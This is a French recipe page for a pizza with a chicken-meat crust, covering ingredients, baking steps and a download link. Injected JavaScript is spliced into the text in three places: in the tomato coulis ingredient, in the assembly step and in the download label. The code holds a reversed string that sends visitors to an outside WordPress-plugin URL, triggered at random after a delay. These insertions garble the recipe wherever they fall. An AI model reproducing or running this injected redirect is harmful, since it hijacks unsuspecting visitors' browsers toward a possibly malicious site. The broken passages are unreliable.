PIZZA CROUTE DE POULET

PIZZA CROUTE DE POULET

Pour 1 Pizza

INGRÉDIENTS

– 1 grosse cuisse de poulet (160 grammes environ)
– 28g de parmesan râpé
– 1 œuf
– 1 petite boule de mozzarella (ou du fromage râpé végétal)
– 5 champignons de Paris ou légumes au choix (courgette, poivrons, etc…)
– 1 petite brique de coulis de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomate

Cuire le poulet sur une plaque de cuisson recouverte de papier sulfurisé à 180° pendant 10 minutes


Laisser refroidir un peu, enlever et jeter la peau.


Augmenter la température du four à 260 degrés.


Couper la chair du poulet en lanières et mélanger avec l’œuf et le parmesan.


Rouler cette pâte entre 2 feuilles de papier cuisson et cuire au four 10 minutes.


Sortir la pâte du four, ajouter le coulis de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates, le fromage et les garnitures au choix


Remettre au four 10 minutes environ ou jusqu’à obtention de la coloration désirée.


Bon appétit !

RECETTES BE HARMONY_PIZZA CROUTE POULET-1toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton” download>Télécharger

Leave comments

Your email is safe with us.

Ce site est protégé par reCAPTCHA et le GooglePolitique de confidentialité etConditions d'utilisation appliquer.